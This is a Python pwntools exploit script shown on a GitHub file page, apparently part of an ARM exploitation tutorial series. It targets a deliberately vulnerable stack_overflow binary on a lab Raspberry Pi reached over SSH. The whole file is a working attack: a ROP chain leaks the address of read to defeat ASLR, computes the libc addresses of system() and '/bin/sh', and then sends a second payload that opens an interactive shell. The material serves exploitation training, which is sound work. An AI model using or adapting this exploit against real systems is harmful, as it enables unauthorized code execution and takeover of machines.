Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
47 lines (36 sloc) 1.41 KB
#!/usr/bin/env python2
from pwn import *
ip = "192.168.0.13"
port = 22
user = "pi"
pwd = "toSet"
libc = ELF('libc-2.24.so')
shell = ssh(user, ip, password=pwd, port=port)
sh = shell.run('/home/pi/arm/episode3/stack_overflow')
payload = "A"*64
payload += p32(0x1) # r0 - standard output
payload += p32(0x1046C) # rop gadget pop {r0, r1, r2, lr}; bx lr
payload += p32(0x2100c) # r1 - address of read
payload += p32(0x4) # r2 - number of bytes to write
payload += p32(0x104C8) # lr - address of write
payload += p32(0x00) # not used
payload += p32(0x10488) # jump to the read - 0x104d4 <main+36> pop {r11, pc}
sh.sendline(payload)
# get the read address
read_address = u32(sh.recv(4))
log.info('address of the read: %#x' % read_address)
# get the libc_base address
libc_base_address = read_address - libc.symbols['read']
# get the system address
system_address = libc_base_address + libc.symbols['system']
log.info('address of the system: %#x' % system_address)
shell_address = libc_base_address + next(libc.search("/bin/sh"))
payload = "A"*64
payload += p32(shell_address) # r0 - /bin/sh address
payload += p32(0x1046C) # rop gadget pop {r0, r1, r2, lr}; bx lr
payload += p32(0x00) # r1 - not used
payload += p32(0x00) # r2 - not used
payload += p32(system_address) # lr - address of the system
sh.sendline(payload)
sh.interactive()
shell.close()